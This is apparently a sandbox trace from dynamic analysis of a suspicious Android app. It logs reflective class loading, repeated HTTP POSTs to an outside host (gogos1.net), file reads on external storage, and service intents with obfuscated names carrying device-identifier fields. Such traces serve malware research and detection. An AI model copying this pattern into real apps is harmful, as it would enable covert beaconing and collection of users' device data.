D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [94]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [95]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { act=myboau.kqnrrcu.ajfncdotStart76 (has extras) } [ExtraInfo][key:value][apiKey:mapk01_20f][imei:null][imsi:null][type:notificationType][appId:76][phone:null]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [97]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [97]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [97]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [98]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { act=myboau.kqnrrcu.ajfncdotStart76 (has extras) } [ExtraInfo][key:value][apiKey:mapk01_20f][imei:null][imsi:null][type:notificationType][appId:76][phone:null]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [100]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [100]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [100]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [101]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { act=myboau.kqnrrcu.ajfncdotStart76 (has extras) } [ExtraInfo][key:value][apiKey:mapk01_20f][imei:null][imsi:null][type:notificationType][appId:76][phone:null]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [103]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [103]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [103]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/ouepxayhr.efutel/app_webview/Application Cache/Index]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [104]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [android.content.ContextWrapper] [startService] [Intent] Intent { act=myboau.kqnrrcu.ajfncdotStart76 (has extras) } [ExtraInfo][key:value][apiKey:mapk01_20f][imei:null][imsi:null][type:notificationType][appId:76][phone:null]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.ConnectivityManager]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.net.NetworkInfo]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Thread]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runnable]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Service]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://gogos1.net/index.php]
D/S4URC   ( 3753): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.util.Log]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [106]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [106]
D/S4URC   ( 3753): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/wspr1]
D/S4URC   ( 3753): [NDK] [SYSCALL] [open] [PATH][string] [/storage/sdcard0/wspr1] [RETURN][int] [106]
D/S4URC   ( 3753): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
